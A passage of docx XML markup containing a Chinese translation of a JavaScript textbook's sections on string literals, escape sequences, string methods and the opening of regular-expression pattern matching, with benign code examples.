        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScr</w:t>
      </w:r>
      <w:r>
        <w:t>ipt 3</w:t>
      </w:r>
      <w:r>
        <w:t>中，字符串直接量必须写在一行中，而在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，字符串直接量可以拆分成数行，每行必须以反斜线（</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>）结束，反斜线和行结束符都不算是字符串直接量的内容。如果希望在字符串直接量中另起一行，可以使用转义字符</w:t>
      </w:r>
      <w:r>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>（后续会有介绍）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"two\nlines"//</w:t>
      </w:r>
      <w:r>
        <w:t>这里定义了一个显示为两行的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"one\//</w:t>
      </w:r>
      <w:r>
        <w:t>用三行代码定义了显示为单行的字符串，只在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中可用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>long\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>line"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要注意的是，当使用单引号来定界字符串时，需要格外小心英文中的缩写和所有格写法，比如</w:t>
      </w:r>
      <w:r>
        <w:t>can't</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly's</w:t>
      </w:r>
      <w:r>
        <w:t>。因为撇号和单引号是同一个字符，所以必须使用反斜线</w:t>
      </w:r>
      <w:r>
        <w:t>(\)</w:t>
      </w:r>
      <w:r>
        <w:t>来转义（转义符将在下一章讲解）所有的撇号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序设计中，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码会夹杂</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码的字符串，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码也会夹杂</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>也使用单引号或者双引号来定界字符串，因此，当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码混杂在一起的时候，最好在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码中各自使用独立的引号风格。例如，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式中使用单引号表示字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"Thank you"</w:t>
      </w:r>
      <w:r>
        <w:t>，而在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序属性中则使用双引号表示字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="alert('Thank you')"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Click Me</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="3_2_2_Zhuan_Yi_Zi_Fu_"/>
      <w:r>
        <w:t>3.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　转义字符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串中，反斜线</w:t>
      </w:r>
      <w:r>
        <w:t>(\)</w:t>
      </w:r>
      <w:r>
        <w:t>有着特殊的用途，反斜线符号后加一个字符，就不再表示它们的字面含义了，比如，</w:t>
      </w:r>
      <w:r>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>就是一个转义字符</w:t>
      </w:r>
      <w:r>
        <w:t>(escape sequence)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>，它表示的是一个换</w:t>
      </w:r>
      <w:r>
        <w:t>行符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>另一个例子是上节中提到的转义字符</w:t>
      </w:r>
      <w:r>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:t>，表示单引号（或撇号）。当需要在一个单引号定界的字符串内使用撇号的时候，它就显得非常有用。现在你就会明白我们为什么把它们叫做转义字符了，因为反斜线可以使我们避免使用常规方式解释单引号，当单引号不是用来标记字符串结尾时，它只是一个撇号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'You\'re right,it can\'t be a quote'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表格</w:t>
      </w:r>
      <w:r>
        <w:t>3-1</w:t>
      </w:r>
      <w:r>
        <w:t>列出了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的转义字符以及它们所代表的含义。其中有两个是通用的，通过十六进制数表示</w:t>
      </w:r>
      <w:r>
        <w:t>Latin-1</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>中的任意字码。例</w:t>
      </w:r>
      <w:r>
        <w:t>如，</w:t>
      </w:r>
      <w:r>
        <w:t>\xA9</w:t>
      </w:r>
      <w:r>
        <w:t>表示版权符号，版权符号的</w:t>
      </w:r>
      <w:r>
        <w:t>Latin-1</w:t>
      </w:r>
      <w:r>
        <w:t>编码是十六进制数</w:t>
      </w:r>
      <w:r>
        <w:t>A9</w:t>
      </w:r>
      <w:r>
        <w:t>。同样，</w:t>
      </w:r>
      <w:r>
        <w:t>\u</w:t>
      </w:r>
      <w:r>
        <w:t>表示由</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个十六进制数指定的任意</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符，比如，</w:t>
      </w:r>
      <w:r>
        <w:t>\u03c0</w:t>
      </w:r>
      <w:r>
        <w:t>表示字符</w:t>
      </w:r>
      <w:r>
        <w:t>π</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4075981" cy="1030856"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="7" name="00007.jpeg" descr="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00007.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4075981" cy="1030856"/>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4119113" cy="2100532"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="8" name="00008.jpeg" descr="000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00008.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119113" cy="2100532"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>“\”</w:t>
      </w:r>
      <w:r>
        <w:t>字符位于没有在表</w:t>
      </w:r>
      <w:r>
        <w:t>3-1</w:t>
      </w:r>
      <w:r>
        <w:t>中列出的字符前，则忽略</w:t>
      </w:r>
      <w:r>
        <w:t>“\”</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（当然，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言将来的版本可能定义新的转义符）。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>“\#”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“#”</w:t>
      </w:r>
      <w:r>
        <w:t>等价。最后，上文提到过，在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，允许在一个多行字符串直接量里的每行结束处使用反斜线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="3_2_3_Zi_Fu_Chuan_De_Shi_Yong_"/>
      <w:r>
        <w:t>3.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　字符串的使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的内置功能之一就是字符串连接。如果将</w:t>
      </w:r>
      <w:r>
        <w:t>加号</w:t>
      </w:r>
      <w:r>
        <w:t>(+)</w:t>
      </w:r>
      <w:r>
        <w:t>运算符用于数字，表示两数相加。但将它作用于字符串，则表示字符串连接，将第二个字符串拼接在第一个之后，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>msg="Hello,"+"world";//</w:t>
      </w:r>
      <w:r>
        <w:t>生成字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"Hello,world"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>greeting="Welcome to my blog,"+""+name;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要确定一个字符串的长度</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>其所包含的</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值的个数</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性。比如，要得到字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的长度：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，字符串还提供许多可以调用的方法（可以在第三部分查到详细信息）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="hello,world"//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>s.charAt(0)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"h":</w:t>
      </w:r>
      <w:r>
        <w:t>第一个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.charAt(s.length-1)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"d":</w:t>
      </w:r>
      <w:r>
        <w:t>最后一个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.substring(1,4)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"ell":</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.slice(1,4)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"ell":</w:t>
      </w:r>
      <w:r>
        <w:t>同上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.slice(-3)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"rld":</w:t>
      </w:r>
      <w:r>
        <w:t>最后三个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.indexOf("l")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:t>字符</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>首次出现的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.lastIndexOf("l")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>10:</w:t>
      </w:r>
      <w:r>
        <w:t>字符</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>最后一次出现的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.indexOf(</w:t>
      </w:r>
      <w:r>
        <w:t>"l",3)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:t>在位置</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>及之后首次出现字符</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.split(",")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>["hello","world"]</w:t>
      </w:r>
      <w:r>
        <w:t>分割成子串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.replace("h","H")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Hello,world":</w:t>
      </w:r>
      <w:r>
        <w:t>全文字符替换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.toUpperCase()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"HELLO,WORLD"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>记住，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中字符串是固定不变的，类似</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toUpperCase()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法都返回新字符串，原字符串本身并没有发生改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，字符串可以当做只读数组，除了使用</w:t>
      </w:r>
      <w:r>
        <w:t>cha</w:t>
      </w:r>
      <w:r>
        <w:t>rAt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，也可以使用方括号来访问字符串中的单个字符（</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s="hello,world";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s[0]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"h"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s[s.length-1]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"d"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>）很久之前就支持这种方式的字符串索引，多数现代浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>(IE</w:t>
      </w:r>
      <w:r>
        <w:t>除外</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>也紧跟</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>的脚步，在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>成型之前就支持了这一特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="3_2_4_Mo_Shi_Pi_Pei_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　模式匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，用来创建表示文本匹配模式的对象。这些模式称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t>gular expression</w:t>
      </w:r>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:r>
